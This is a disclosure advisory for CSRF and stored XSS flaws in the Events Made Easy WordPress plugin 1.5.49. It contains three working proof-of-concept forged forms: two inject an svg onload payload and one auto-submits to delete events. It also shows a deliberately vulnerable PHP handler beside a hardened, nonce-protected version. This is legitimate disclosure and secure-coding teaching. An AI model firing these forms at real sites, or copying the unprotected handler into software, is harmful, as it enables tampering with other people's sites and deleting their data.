Events Made Easy WordPress plugin CSRF + Persistent XSS

Oct 18th, 2015
Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting
Original advisory:
https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/

Events Made Easy is a full-featured event management solution for
WordPress. Events Made Easy supports public, private, draft and recurring
events, locations management, RSVP (+ optional approval), Paypal,
2Checkout, FirstData and Google maps. With Events Made Easy you can plan
and publish your event, or let people reserve spaces for your weekly
meetings. You can add events list, calendars and description to your blog
using multiple sidebar widgets or shortcodes; if you are a web designer you
can simply employ the template tags provided by Events Made Easy.

When playing around with this plugin I noticed a couple of vulnerabilities.
In my opinion they are critical because they could cause damage to a
WordPress installation.
All of them are related to CSRF: the vendor forgot to place a security
token (wp_nonce) on the affected forms, so any POST that arrives with a
logged-in admin's cookies is accepted, wherever it was submitted from.

#1 Add template CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-templates

If an authenticated admin clicks the “Add template” button on an HTML page
containing this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-templates"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>

A template is created with a persistent XSS payload in its description
field. The description is rendered back without escaping, so the payload
executes every time an admin visits admin.php?page=eme-templates.

Possible attack scenario:

The malicious user checks that Events Made Easy is installed on a WordPress
installation.
The malicious user sends the admin a link to a page that hosts an auto-submit
form carrying an XSS vector that hijacks the victim's browser.
The victim visits the page and gets hijacked.

#2 Add Form Field CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-formfields

If an authenticated admin clicks the “Add field” button on an HTML page
containing this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>

The attack scenario is the same as for vulnerability #1: the missing nonce
also affects the form fields page, and the stored field name is rendered
without escaping.

#3 Remove events older than CSRF

URL: /wp-admin/admin.php?page=eme-cleanup

With this CSRF a malicious user could delete all events older than a chosen
period (a number plus a unit, e.g. 1 day), with no XSS needed.
In my proof of concept I used an auto-submit form that could also be used in
vulnerabilities #1 and #2.

<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"
name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script>

Possible attack scenario:

The malicious user checks that Events Made Easy is installed on a WordPress
installation.
The malicious user sends the admin a link to a page that hosts this
auto-submit form.
Without the victim noticing, all events older than 1 day are removed.

Solution:
The vendor released a patched version, 1.5.50, in a matter of a few hours.
He was also kind enough to put my name in the changelog.

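
For readers who maintain a plugin with the same pattern, the following is an added example (not the plugin's code and not the vendor's 1.5.50 patch) of what the missing protection looks like and how it is usually fixed in WordPress: a nonce bound to a specific action is embedded in the form with wp_nonce_field() and verified in the handler with check_admin_referer(), a capability check guards the state change, input is sanitized on the way in and escaped on the way out. Function names prefixed eme_example_, the table and column names, the nonce action names and the manage_options capability are all assumptions made for the example. With the nonce in place, the auto-submit forms above fail because the attacker's page cannot supply a token that was issued to the victim's session for that action.

```php
<?php
/*
 * Added example modelled on the advisory's pattern. Not the plugin's
 * code. All eme_example_* names, table/column names, nonce action
 * strings and the capability are assumptions.
 */

// --- Vulnerable pattern (what the advisory describes) ----------------------
// No nonce, so any POST carrying a logged-in admin's cookies is accepted,
// and the stored description is echoed back raw (persistent XSS).
function eme_example_vulnerable_handler() {
    global $wpdb;
    if ( isset( $_POST['eme_admin_action'] ) && $_POST['eme_admin_action'] === 'do_addtemplate' ) {
        $wpdb->insert( $wpdb->prefix . 'eme_templates', array(
            'description' => $_POST['description'], // attacker-controlled, unsanitized
            'format'      => $_POST['format'],
        ) );
    }
    foreach ( $wpdb->get_results( "SELECT description FROM {$wpdb->prefix}eme_templates" ) as $row ) {
        echo '<td>' . $row->description . '</td>'; // rendered without escaping
    }
}

// --- Hardened pattern -------------------------------------------------------
// 1. The form embeds a nonce tied to one action (plus a referer field).
function eme_example_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=eme-templates' ) ) . '">';
    wp_nonce_field( 'eme_add_template', 'eme_add_template_nonce' );
    echo '<input type="hidden" name="eme_admin_action" value="do_addtemplate" />';
    echo '<input type="text" name="description" />';
    echo '<input type="text" name="format" />';
    submit_button( 'Add template' );
    echo '</form>';
}

// 2. The handler checks capability AND nonce before any state change.
function eme_example_hardened_handler() {
    global $wpdb;

    if ( isset( $_POST['eme_admin_action'] ) && $_POST['eme_admin_action'] === 'do_addtemplate' ) {
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient privileges' );
        }
        // Calls wp_die() if the nonce is absent, expired, or was issued for a
        // different action or user. A cross-site form never sees the admin
        // page, so it cannot obtain a valid token. Always pass an explicit
        // action; the default -1 action is the same for every form.
        check_admin_referer( 'eme_add_template', 'eme_add_template_nonce' );

        $description = sanitize_text_field( wp_unslash( $_POST['description'] ) );
        $format      = sanitize_text_field( wp_unslash( $_POST['format'] ) );

        $wpdb->insert(
            $wpdb->prefix . 'eme_templates',
            array( 'description' => $description, 'format' => $format ),
            array( '%s', '%s' )
        );
    }

    // Escape at output regardless of what reached the database: the nonce
    // stops CSRF, but rows written before the fix or by other code paths
    // still need this.
    foreach ( $wpdb->get_results( "SELECT description FROM {$wpdb->prefix}eme_templates" ) as $row ) {
        echo '<td>' . esc_html( $row->description ) . '</td>';
    }
}

// 3. The cleanup action (#3) has no XSS component; the same two checks apply,
//    and the period unit is whitelisted before it reaches the query.
function eme_example_hardened_cleanup() {
    global $wpdb;
    if ( isset( $_POST['eme_admin_action'] ) && $_POST['eme_admin_action'] === 'eme_cleanup' ) {
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient privileges' );
        }
        check_admin_referer( 'eme_cleanup', 'eme_cleanup_nonce' );

        $units  = array( 'day' => 'DAY', 'month' => 'MONTH', 'year' => 'YEAR' );
        $period = isset( $_POST['eme_period'] ) ? $_POST['eme_period'] : '';
        if ( ! isset( $units[ $period ] ) ) {
            wp_die( 'Invalid period' );
        }
        $number = absint( $_POST['eme_number'] );
        // Unit comes from the whitelist above, number is bound via prepare().
        $wpdb->query( $wpdb->prepare(
            "DELETE FROM {$wpdb->prefix}eme_events WHERE event_end < DATE_SUB(NOW(), INTERVAL %d {$units[ $period ]})",
            $number
        ) );
    }
}
```

Adding the nonce field to the form alone changes nothing; the check in the handler is what rejects the forged request. Escaping the description at output is kept even though sanitize_text_field() already strips tags on input, because input filtering can be bypassed by other write paths and escaping on output is what actually prevents the stored payload from executing.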
*-David Sopas*
*davidsopas.com <https://www.davidsopas.com>*
*@dsopas <https://www.twitter.com/dsopas>*